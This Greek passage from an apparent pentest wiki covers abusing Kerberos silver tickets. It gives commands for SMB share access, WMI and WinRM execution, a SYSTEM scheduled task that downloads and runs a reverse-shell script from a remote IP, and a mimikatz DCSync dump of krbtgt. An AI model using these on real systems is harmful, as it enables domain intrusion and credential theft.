HOST
RPCSS
| | Απομακρυσμένη Εντολή PowerShell |HOST
HTTP
Ανάλογα με το OS επίσης:
WSMAN
RPCSS
| | WinRM |HOST
HTTP
Σε κάποιες περιπτώσεις μπορείτε απλά να ζητήσετε: WINRM
| | Προγραμματισμένες Εργασίες | HOST | | Κοινόχρηστος Φάκελος Windows, επίσης psexec | CIFS | | Λειτουργίες LDAP, περιλαμβάνεται το DCSync | LDAP | | Εργαλεία Διαχείρισης Απομακρυσμένου Διακομιστή Windows |RPCSS
LDAP
CIFS
| | Golden Tickets | krbtgt | Χρησιμοποιώντας το **Rubeus** μπορείτε να **ζητήσετε όλα** αυτά τα εισιτήρια χρησιμοποιώντας την παράμετρο: * `/altservice:host,RPCSS,http,wsman,cifs,ldap,krbtgt,winrm` ### Συμβάντα ID Silver tickets * 4624: Είσοδος Λογαριασμού * 4634: Αποσύνδεση Λογαριασμού * 4672: Είσοδος Διαχειριστή ## Κατάχρηση Εισιτηρίων Υπηρεσιών Στα παρακάτω παραδείγματα ας υποθέσουμε ότι το εισιτήριο ανακτήθηκε παριστάνοντας τον λογαριασμό διαχειριστή. ### CIFS Με αυτό το εισιτήριο θα μπορείτε να έχετε πρόσβαση στους φακέλους `C$` και `ADMIN$` μέσω **SMB** (αν είναι εκτεθειμένοι) και να αντιγράψετε αρχεία σε ένα τμήμα του απομακρυσμένου συστήματος αρχείων απλά κάνοντας κάτι σαν: ```bash dir \\vulnerable.computer\C$ dir \\vulnerable.computer\ADMIN$ copy afile.txt \\vulnerable.computer\C$\Windows\Temp ``` ### ΚΕΝΤΡΙΚΟΣ ΥΠΟΛΟΓΙΣΤΗΣ Με αυτήν την άδεια μπορείτε να δημιουργήσετε προγραμματισμένες εργασίες σε απομακρυσμένους υπολογιστές και να εκτελέσετε αυθαίρετες εντολές: ```bash #Check you have permissions to use schtasks over a remote server schtasks /S some.vuln.pc #Create scheduled task, first for exe execution, second for powershell reverse shell download schtasks /create /S some.vuln.pc /SC weekly /RU "NT Authority\System" /TN "SomeTaskName" /TR "C:\path\to\executable.exe" schtasks /create /S some.vuln.pc /SC Weekly /RU "NT Authority\SYSTEM" /TN "SomeTaskName" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.114:8080/pc.ps1''')'" #Check it was successfully created schtasks /query /S some.vuln.pc #Run created schtask now schtasks /Run /S mcorp-dc.moneycorp.local /TN "SomeTaskName" ``` ### HOST + RPCSS Με αυτά τα εισιτήρια μπορείτε **να εκτελέσετε το WMI στο σύστημα θύματος**: ```bash #Check you have enough privileges Invoke-WmiMethod -class win32_operatingsystem -ComputerName remote.computer.local #Execute code Invoke-WmiMethod win32_process -ComputerName $Computer -name create -argumentlist "$RunCommand" #You can also use wmic wmic remote.computer.local list full /format:list ``` Βρείτε **περισσότερες πληροφορίες σχετικά με το wmiexec** στην ακόλουθη σελίδα: {% content-ref url="../lateral-movement/wmicexec.md" %} [wmicexec.md](../lateral-movement/wmicexec.md) {% endcontent-ref %} ### HOST + WSMAN (WINRM) Με πρόσβαση winrm σε έναν υπολογιστή μπορείτε **να έχετε πρόσβαση** και ακόμη να λάβετε ένα PowerShell: ```bash New-PSSession -Name PSC -ComputerName the.computer.name; Enter-PSSession PSC ``` Ελέγξτε την ακόλουθη σελίδα για να μάθετε **περισσότερους τρόπους σύνδεσης με έναν απομακρυσμένο κόμβο χρησιμοποιώντας το winrm**: {% content-ref url="../lateral-movement/winrm.md" %} [winrm.md](../lateral-movement/winrm.md) {% endcontent-ref %} {% hint style="warning" %} Σημειώστε ότι το **winrm πρέπει να είναι ενεργό και να ακούει** στον απομακρυσμένο υπολογιστή για να έχετε πρόσβαση σε αυτόν. {% endhint %} ### LDAP Με αυτό το προνόμιο μπορείτε να αδειάσετε τη βάση δεδομένων DC χρησιμοποιώντας το **DCSync**: ``` mimikatz(commandline) # lsadump::dcsync /dc:pcdc.domain.local /domain:domain.local /user:krbtgt ``` **Μάθετε περισσότερα σχετικά με το DCSync** στην ακόλουθη σελίδα: ## Αναφορές * [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-silver-tickets](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-silver-tickets) * [https://www.tarlogic.com/blog/how-to-attack-kerberos/](https://www.tarlogic.com/blog/how-to-attack-kerberos/) {% content-ref url="dcsync.md" %} [dcsync.md](dcsync.md) {% endcontent-ref %}